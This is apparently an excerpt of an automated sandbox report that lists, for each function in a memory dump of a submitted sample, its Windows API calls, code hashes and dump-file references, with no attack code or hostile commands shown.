    • Instruction ID: 3363ad23d6cb9510badc43a5b0788c29b6feb10258e2cf96d0cd9af023f4fa11
    • Opcode Fuzzy Hash: aed8c09e2bb2d36d49e0413cc8a303d74829a99d7604176badb5978c9ae52077
    • Instruction Fuzzy Hash: 9BE06572604551EFC7119B49DC45B59FBA9FB89B20F04422AB41693760CB746801CA91
    APIs
    • GetFileAttributesW.KERNEL32(?,?,?,000BB4CA,?,000B8042,?), ref: 000BB4E4
      • Part of subcall function 000BCF32: _wcslen.LIBCMT ref: 000BCF56
    • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,?,000BB4CA,?,000B8042,?), ref: 000BB510
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AttributesFile$_wcslen
    • String ID:
    • API String ID: 2673547680-0
    • Opcode ID: 9b5d484dd9e79bf61e7ca6c0369404b941f5ea7d758f10085350326c54465748
    • Instruction ID: b3ed23b2c45cf6ea7562845902b32432d7982ea4a8299f4f5481a2dd198a2842
    • Opcode Fuzzy Hash: 9b5d484dd9e79bf61e7ca6c0369404b941f5ea7d758f10085350326c54465748
    • Instruction Fuzzy Hash: 22E0D8315002686BDB30AB68DC04FD9779CEB497E2F0101B0FE45F7191D7709E418AD0
    APIs
    • _swprintf.LIBCMT ref: 000CF01C
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • SetDlgItemTextW.USER32(00000065,?), ref: 000CF033
      • Part of subcall function 000CC748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000CC759
      • Part of subcall function 000CC748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 000CC76A
      • Part of subcall function 000CC748: IsDialogMessageW.USER32(000103E6,?), ref: 000CC77E
      • Part of subcall function 000CC748: TranslateMessage.USER32(?), ref: 000CC78C
      • Part of subcall function 000CC748: DispatchMessageW.USER32(?), ref: 000CC796
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherItemPeekTextTranslateUser__vswprintf_c_l_swprintf
    • String ID:
    • API String ID: 3954729096-0
    • Opcode ID: b02b25ac1a9930f6635e3f14bd97caba8f1cdb5723bba0d7516769ee2dab6730
    • Instruction ID: 648a3cf7b4812843df9727e4dc8a2cbc3e3ff724169b03812133efe6d2d758f6
    • Opcode Fuzzy Hash: b02b25ac1a9930f6635e3f14bd97caba8f1cdb5723bba0d7516769ee2dab6730
    • Instruction Fuzzy Hash: 08E068B250420C36EF02AB60DC0AFFE3AADAB053C9F040061B204E70A3D7B8D611DF22
    APIs
    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000C1B4F
    • LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,000C0633,Crypt32.dll,00000000,000C06AD,00000200,?,000C0690,00000000,00000000,?), ref: 000C1B71
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: DirectoryLibraryLoadSystem
    • String ID:
    • API String ID: 1175261203-0
    • Opcode ID: 69fca4c9e453082d8cc9cc39d706dd07ca3ec6b7a7b983c4225075214609ba5f
    • Instruction ID: 42351c796f40bcc4d760ab95022f276ac8651ee54cd0dbc9279b9f2ba33aee42
    • Opcode Fuzzy Hash: 69fca4c9e453082d8cc9cc39d706dd07ca3ec6b7a7b983c4225075214609ba5f
    • Instruction Fuzzy Hash: 3DE048768002686ADB1197A4DC48FDA77ACEF097C1F0400757645E2045DA74DA84CBF0
    APIs
    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 000CB3D9
    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 000CB3E0
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: BitmapCreateFromGdipStream
    • String ID:
    • API String ID: 1918208029-0
    • Opcode ID: 7f2685e87673bf5f600afcd8bb396d02fd3883f5cf3593795f2658a83fa0732c
    • Instruction ID: aa0c5a0ded8b43bc2e73aeb6ec9db966d6ed0aa9f3702ed29b682480947dd518
    • Opcode Fuzzy Hash: 7f2685e87673bf5f600afcd8bb396d02fd3883f5cf3593795f2658a83fa0732c
    • Instruction Fuzzy Hash: EDE0ED71904658EFCB50DF59C941BDDB7F9EB04355F20806FE89693601D374AF049B91
    APIs
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000D3D2A
    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 000D3D35
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Value___vcrt____vcrt_uninitialize_ptd
    • String ID:
    • API String ID: 1660781231-0
    • Opcode ID: 061a54e0c2af7a5b666605310e7e514339808cf6f4195d3465b1d955c8ed6c24
    • Instruction ID: 9411210d6991202dad4c820c86e79dc57fdb249e496781d893e0f708fa31f107
    • Opcode Fuzzy Hash: 061a54e0c2af7a5b666605310e7e514339808cf6f4195d3465b1d955c8ed6c24
    • Instruction Fuzzy Hash: ABD0A92A80870415DC2826B478020EA338AAB12BB1BA02697E020CA7C3EB209600A933
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ItemShowWindow
    • String ID:
    • API String ID: 3351165006-0
    • Opcode ID: b2ddc7c4fa45dfff79bd9be625c085d2c9fb3245ddf550e14d495a373862130d
    • Instruction ID: f4863d4751062b4aa5420fb41168a681f9bcb08f5edc0649867b333538bb9f7f
    • Opcode Fuzzy Hash: b2ddc7c4fa45dfff79bd9be625c085d2c9fb3245ddf550e14d495a373862130d
    • Instruction Fuzzy Hash: 41C01232098A00FECB020BB0DE09E6ABBAAABE4212F10CA08F0A6C1060C239C050DB11
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: ed1add446042968dc21cf01dc8f1ed31b856f45c304a2704f84c54db39dc5572
    • Instruction ID: 7448d913845818964280da2da2b0ef2f4362b3f97aea45a2f58c4a74fd5a5f56
    • Opcode Fuzzy Hash: ed1add446042968dc21cf01dc8f1ed31b856f45c304a2704f84c54db39dc5572
    • Instruction Fuzzy Hash: 47C18131A002549BDF65CF28C8E47ED7BE5AF4A710F9801BAEC059F396C7359A44CB61
    APIs
    • __EH_prolog.LIBCMT ref: 000B90A7
      • Part of subcall function 000B13F8: __EH_prolog.LIBCMT ref: 000B13FD
      • Part of subcall function 000B2032: __EH_prolog.LIBCMT ref: 000B2037
      • Part of subcall function 000BB966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 000BB991
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog$CloseFind
    • String ID:
    • API String ID: 2506663941-0
    • Opcode ID: d12b183de52ae237284a67d5be984bafd8406d18cad822835834c8d6399c7e75
    • Instruction ID: 71527d8b1baa5f0dd3b1c2a03604943401db212c0203dec59cb22bb05836ca07
    • Opcode Fuzzy Hash: d12b183de52ae237284a67d5be984bafd8406d18cad822835834c8d6399c7e75
    • Instruction Fuzzy Hash: EA419671D04214AEDB24EB64CCA5BEA77B9AF10340F4404EAF64AA7083DBB55F89DF11
    APIs
    • __EH_prolog.LIBCMT ref: 000B13FD
      • Part of subcall function 000B6891: __EH_prolog.LIBCMT ref: 000B6896
      • Part of subcall function 000BE298: __EH_prolog.LIBCMT ref: 000BE29D
      • Part of subcall function 000B644D: __EH_prolog.LIBCMT ref: 000B6452
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: c9a9b0b06f7bf94bc6d81c0303fe2a10e5852663a4bbc97055d14dfa40b55866
    • Instruction ID: fd0e6ad78bee0509f54da3275f4f32c54eae3bc66e63fc0e7e65e63ad875153b
    • Opcode Fuzzy Hash: c9a9b0b06f7bf94bc6d81c0303fe2a10e5852663a4bbc97055d14dfa40b55866
    • Instruction Fuzzy Hash: 805147B1A0A3808ECB14DF6994802D9BBE5AF59300F0802BEEC5DCF79BD7755214CB62
    APIs
    • __EH_prolog.LIBCMT ref: 000B13FD
      • Part of subcall function 000B6891: __EH_prolog.LIBCMT ref: 000B6896
      • Part of subcall function 000BE298: __EH_prolog.LIBCMT ref: 000BE29D
      • Part of subcall function 000B644D: __EH_prolog.LIBCMT ref: 000B6452
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 2d93b8ac286b1cb264e62f21a9632425e784163e9e79be9cf94d3c6b7287f09b
    • Instruction ID: 68cc23ab72082f1db021207b9cf0425e18dcac47fcf6f65ce6d24fce4aefabe0
    • Opcode Fuzzy Hash: 2d93b8ac286b1cb264e62f21a9632425e784163e9e79be9cf94d3c6b7287f09b
    • Instruction Fuzzy Hash: 985137B190A3808EDB14DF6994802D9BBE5BF59300F0802BEEC5DDF68BD7755214CB62
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 18b44ef3aafc6c4d58ebc82bf42ea41b2ba8330ffb6f8dc1556e9fa6719d5096
    • Instruction ID: 0f414038cf86df210e8d465ed801d031f9e349276ed7810d91cc8c347b84130b
    • Opcode Fuzzy Hash: 18b44ef3aafc6c4d58ebc82bf42ea41b2ba8330ffb6f8dc1556e9fa6719d5096
    • Instruction Fuzzy Hash: 5121B9B5E40715AFDB14DF74CC52BAE7AA8FF14314F00453EE605EB682D774990086A9
    APIs
    • __EH_prolog.LIBCMT ref: 000CC20C
      • Part of subcall function 000B13F8: __EH_prolog.LIBCMT ref: 000B13FD
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: f3689ca2e0e90d32448c58402ad199024d5897693851a90e7fecc8f272bdcdbb
    • Instruction ID: 252e6c461ef4d2e04a9ff4b55bb34b94c6c69ce39eb378d7efce0d3f38707a65
    • Opcode Fuzzy Hash: f3689ca2e0e90d32448c58402ad199024d5897693851a90e7fecc8f272bdcdbb
    • Instruction Fuzzy Hash: 7E214C71C04219AFDF25DF98D851EEEBBB4AF45304F0004AEE80AB7242E7756A45DB61
    APIs
    • __EH_prolog.LIBCMT ref: 000B8828
      • Part of subcall function 000BE298: __EH_prolog.LIBCMT ref: 000BE29D
      • Part of subcall function 000C33D4: __EH_prolog.LIBCMT ref: 000C33D9
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 109ff24139cb342488cccc75f0031791979146f3d4b8cff9aafbd76daf11cc85
    • Instruction ID: a07b1997caf981dc65509a618558e2e7d2534e09925ae4ab07957b15f7cf4dc8
    • Opcode Fuzzy Hash: 109ff24139cb342488cccc75f0031791979146f3d4b8cff9aafbd76daf11cc85
    • Instruction Fuzzy Hash: CD210CB0A007449FD724DF6AC4856DBFBE5BF28300F40892EE59E93652D774A644CB91
    APIs
    • __EH_prolog.LIBCMT ref: 000BE29D
      • Part of subcall function 000B6891: __EH_prolog.LIBCMT ref: 000B6896
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: c08e0d1ce0317a59df2ff27088270f0f1faeb895c3819333dde910f065bdb36f
    • Instruction ID: 6679c5d4cdacfa61e6f1adc81045d7bd1c24f4597d3f2e685e63f65868b29db4
    • Opcode Fuzzy Hash: c08e0d1ce0317a59df2ff27088270f0f1faeb895c3819333dde910f065bdb36f
    • Instruction Fuzzy Hash: 32117371A042849ADB25E7B9D5467EEBAE8AF84300F14446DA446D3383DF789A04C761
    APIs
    • __EH_prolog.LIBCMT ref: 000CEB97
      • Part of subcall function 000C197C: _wcslen.LIBCMT ref: 000C1992
      • Part of subcall function 000B8823: __EH_prolog.LIBCMT ref: 000B8828
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog$_wcslen
    • String ID:
    • API String ID: 2838827086-0
    • Opcode ID: 71919c85323d2703cefc554b4b33d85e1ba46c808c166b24db4b054185a44669
    • Instruction ID: de3f0f0113b131252c7bf06e2d00d83a2fe2f1ec626e59e97728b3c1ef2526bf
    • Opcode Fuzzy Hash: 71919c85323d2703cefc554b4b33d85e1ba46c808c166b24db4b054185a44669
    • Instruction Fuzzy Hash: 9811C471608284DED715EB68EC06BDD7FA4EB15320F00806EF188936A3DBF51684CBA2
    APIs
      • Part of subcall function 000DC2E6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000DA533,00000001,00000364,?,000D53ED,?,?,000F30C4), ref: 000DC327
    • _free.LIBCMT ref: 000DD695
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AllocateHeap_free
    • String ID:
    • API String ID: 614378929-0
    • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
    • Instruction ID: 7ad0865356296a408819772b0324a42a23b52c4df21efdf044e7cec0e0542964
    • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
    • Instruction Fuzzy Hash: 2B01D672204305ABE3218E65984599AFBDDEB99370F25051FE59893380EA30A805CA78
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000DA533,00000001,00000364,?,000D53ED,?,?,000F30C4), ref: 000DC327
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 29b0a11800bd70c15b8245bfec7581d5c6f38448b22b25d48eb4ed46fb8b583c
    • Instruction ID: 8218433e9bc347ec2ae89566a6924ae77e6f768f532179fdfbe47c2e38ce52bb
    • Opcode Fuzzy Hash: 29b0a11800bd70c15b8245bfec7581d5c6f38448b22b25d48eb4ed46fb8b583c
    • Instruction Fuzzy Hash: C1F0B431604326A6FB751A269C45E9A37989F81B60B14C023F804E63A1DA20DA01D6B1
    APIs
    • __EH_prolog.LIBCMT ref: 000B6452
      • Part of subcall function 000C04E5: __EH_prolog.LIBCMT ref: 000C04EA
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
